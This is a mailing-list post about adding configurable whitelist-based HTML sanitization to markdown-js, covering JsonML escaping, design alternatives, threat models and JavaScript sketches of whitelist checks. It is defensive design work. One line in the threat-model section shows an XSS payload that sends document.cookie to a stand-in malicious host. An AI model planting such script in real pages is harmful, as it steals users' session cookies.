Hi. I'm going to add HTML sanitization to markdown-js, and I wanted to hear about other people's experience with this. This mail is long (it should take about five minutes to read), but I'll waste a lot more than five minutes if I go down a dead-end rabbit hole on this. From my comments on [the issue on GitHub][]:

[the issue on GitHub]: https://github.com/evilstreak/markdown-js/issues/16#issuecomment-1681056 (issue 16 on markdown-js: "HTML support")

(I've bolded some phrases below to facilitate skimming; I hope it's not too annoying when you're reading straight through.)

Okay, well, I guess I'm committed to implementing this, then. Here's what I'm thinking about how to do it. Is this a good way to do it? **I'd really appreciate comments** before I go haring off without the benefit of other people's advice and experience.

* JsonML doesn't have a spec written in English, as far as I can tell, just a [BNF grammar][] and some example implementations in [XSLT][] and [JS with the DOM][DOM]. As far as I can tell, both example implementations unescape entity references on input and re-escape them on output, although there's no English text to explain whether this is intentional or a bug. I assert that **this is a bug**, because it robs JsonML of any way to represent SGML entity references. I propose that JsonML strings should be treated as PCDATA (allowed to contain entities but not tags) rather than as CDATA (plain text) or HTML (text with entities and tags).

  [BNF grammar]: http://jsonml.org/ (The JsonML spec)
  [XSLT]: http://jsonml.org/JsonML.xslt
  [DOM]: http://jsonml.org/JsonML_DOM.js

* Accordingly, when we *parse* a code block or inline code chunk, we should escape `&` and `<` in it, and when we parse any other node, we should run it through an HTML parser to break it down into subnodes, ensuring that it's well-formed, modulo possible references to entities that we don't know about.
  (I don't propose to include a list of all defined HTML entities in markdown-js.) This means that in general we will **not escape HTML on output**. It also means that the effect of poorly-nested input tags will be limited to at most one parse-tree node.

* The HTML parser used as an input filter should be **configurable with whitelists** of tags, attributes per tag, and URL schemes per attribute. By default it should be configured with a fairly strict filter, blocking even inline images and iframes with off-host URIs, and of course any possible vector for JS. This will annoy people like cadorn, for whom such filtering is unnecessary, so they need an easy way to turn off the whitelists (if not the HTML parsing entirely). But I think that is better than someone doing a `git pull` on markdown-js and getting privacy and XSS problems added to their application. That is, **the default should be safe**.

I'm **hoping I can use an existing pure-JS HTML parser** (say, [jsdom][]'s, or [kn_htmlsafe_htmlSanitize][], or [NodeHtmlParser][]) rather than hacking one together from scratch. (As a fallback, I could write a very simple parser for the tags-and-attributes subset of XHTML.) I'm a little worried about the performance implications of this; markdown-js is already a little slower than Showdown, and this could make matters worse. Does **anybody have recommendations here?** (In the case where it's running in a modern browser, we could use `DOMParser` as an optimization, but enough people are using markdown-js in Node that I don't think it makes sense to depend on that.)
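To make the two rules above concrete, here's a rough sketch of what I have in mind. All the names here are invented for illustration, not existing markdown-js API: code spans get escaped into PCDATA on input, and everything else goes through a tag/attribute/scheme whitelist check.

```javascript
// Sketch only: code spans become PCDATA by escaping & and < on input.
// (& must be escaped first, or we'd double-escape the &lt; we produce.)
function escapeCode(text) {
  return text.replace(/&/g, "&amp;").replace(/</g, "&lt;");
}

// A whitelist of tags, attributes per tag, and URL schemes per attribute.
// This particular table is a made-up example of a "fairly strict" default.
var whitelist = {
  tags: { a: ["href", "title"], em: [], strong: [], code: [], p: [] },
  schemes: { href: ["http", "https", "mailto"] }
};

function allowAttribute(tag, attr, value) {
  var attrs = whitelist.tags[tag];
  if (!attrs || attrs.indexOf(attr) === -1) return false;
  var schemes = whitelist.schemes[attr];
  if (!schemes) return true;                  // not a URL-valued attribute
  var m = /^\s*([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(value);
  if (!m) return true;                        // relative URL: no scheme to check
  return schemes.indexOf(m[1].toLowerCase()) !== -1;
}
```

The scheme check is the important part: matching the scheme explicitly (rather than grepping for "javascript") is what makes this a whitelist instead of a blacklist.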
[jsdom]: https://github.com/tmpvar/jsdom (Elijah Insua's MIT-licensed pure-JS implementation of the W3C DOM)
[kn_htmlsafe_htmlSanitize]: http://mod-pubsub.cvs.sourceforge.net/viewvc/mod-pubsub/mod_pubsub/js_pubsub/js/kn_htmlsafe.js?revision=1.2&view=markup (Ben Sittler's 3-clause-BSD-licensed whitelisting, but not particularly configurable, pure-JS HTML sanitizer)
[NodeHtmlParser]: https://github.com/kirbysayshi/node-htmlparser (A forgiving HTML/XML/RSS parser written in JS for both the browser and NodeJS)

Other variations:

1. **Parse HTML on output**, not input, instead of building JsonML nodes in the intermediate representation. This has the disadvantage that it would make some kinds of processing on the intermediate representation harder. For example, in [yamemex][] I want to support Twitter-style #hashtags, and that will be easier to do if I can tell which hash marks are in the text of the document and which are in some URL somewhere. Also, any markup added by intermediate-representation processing would be prone to being stripped by the output filter. The advantage is that it would probably make the intermediate processing run faster and take less memory, and it expands the usable HTML parsers beyond just those that build a parse tree, which is slow; HTML parsers that simply produce sanitized HTML could be used. Also, the intermediate representation would be simpler, since it wouldn't have HTML tag names in it. This would involve changing the intermediate "JsonML" representation to have HTML rather than CDATA or PCDATA contents, so the character `&` would be represented as `&amp;` in the intermediate representation, not as `&`, and `<b>` would mean a bold tag rather than literal text.

2. Leave the semantics of the intermediate representation unchanged aside from adding more tag names, parsing HTML on input and **using an exhaustive list of HTML entities** to convert things like `&copy;` © and `&Dagger;` ‡ to Unicode characters. I think this would be a hassle to maintain.
   (Note that `&Dagger;` doesn't show up correctly here [clarification: on GitHub] because GitHub has undertaken to maintain such a list for their Markdown implementation, and failed. Visit the URL `data:text/html,&Dagger;` to see that your browser supports it.)

3. Rather than parsing HTML on input or when rendering each node for output, pass HTML tags through from input to output (except inside code blocks, of course) and then run a final HTML-sanitizing pass on the output string to ensure that it's well-formed and safe. This has the advantage of very minimal coupling, and it would handle e.g. `<img src="http://webbugs.example.com/">` the same way regardless of whether it was generated from `![ ](http://webbugs.example.com/)` or just included literally in the source. The disadvantages are that it may be even slower than the other alternatives (making an additional pass over markup whose well-formedness and safety is guaranteed by construction), it could be a little more bug-prone ("Where did all of my `<ol>`s go? Oh, I left `ol` out of the whitelist."), and it doesn't facilitate intermediate processing in any way.

[yamemex]: https://github.com/kragen/yamemex/tree/markdown-js (My project using markdown-js for, ultimately, social bookmarking.)

So, **what do other people think?** The above represents a few hours of me thinking about the problem, but I anticipate that implementing it will take at least a few days of work, so I'd really appreciate help in thinking this through before I jump in.

Kragen

P.S. I guess I should elaborate a little bit on the kinds of use cases/threat models I'm thinking of here:

1. Using Markdown to write your own blog on your own domain, which is cadorn's use case. There's little benefit to filtering your markup in this case; the worst case is that your blog is formatted funny because you forgot to close a `<blockquote>` or something. Unless you copy and paste a chunk of HTML from somewhere else, which brings us to:

2.
   Using Markdown to render stuff pulled (manually or automatically) from another [origin][]. The risk here is that the author of the stuff may have included some code to take actions on your behalf and exfiltrate your private information (known as "cross-site scripting"), either in a straightforward way such as `<script>im=new Image(); im.src="http://malicious.example.com/?"+document.cookie</script>` or in some more subtle way designed to evade naïve filters. Doing this reliably requires that you use a whitelist rather than a blacklist, so you don't end up like the [stupid losers who built MySpace][Samy].

   [origin]: http://www.w3.org/Security/wiki/Same_Origin_Policy (As defined in the same-origin policy.)
   [Samy]: http://namb.la/popular/tech.html (Samy Kamkar explains the unbelievably incompetent security measures he hacked around to crash MySpace.)

   Note that this category includes things like blogging software, where someone might plausibly copy and paste a piece of someone else's web page in order to quote it.

3. Using Markdown to render stuff sent by a possible spammer, or by someone else who has an illegitimate interest in knowing whether you have read it (such as email), in which case you do *not* want to confirm to the spammer that you have read it. In this case you want to filter out anything whose rendering will generate network traffic (to anywhere other than the source of the rendered document, that is), such as `<img src>` and `<iframe>`, as well as all the items covered in #2 above.

I believe yamemex is in category 2, because I excerpt the pages I bookmark with it all the time. markdown-js is currently safe for this case because it escapes all HTML, but I want it to let safe HTML through. I think that almost any server-based web application that renders Markdown taken from client requests is in category 2, if not category 3, and I think (though I don't know) that many markdown-js applications do that.
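P.P.S. For what it's worth, here's a tiny sketch (again with invented names, not proposed API) of how those three categories might map onto a single decision function for embedded resources. The origin comparison is deliberately crude; it's just meant to show the shape of the policy.

```javascript
// Sketch: should we allow an embedded resource (img, iframe, ...) whose
// URL is `url`, given the origin the document came from and which of the
// three threat-model categories above applies?
//   category 1: trust everything (your own blog on your own domain)
//   category 2: block script vectors, but images are fine
//   category 3: additionally block anything that phones home off-origin
function allowEmbed(tag, url, sourceOrigin, category) {
  if (category === 1) return true;
  if (/^\s*(javascript|vbscript|data):/i.test(url)) return false; // XSS vectors
  if (category === 2) return tag !== "script" && tag !== "iframe";
  // category 3: only embeds pointing back at the source origin may load
  return url.indexOf(sourceOrigin) === 0;
}
```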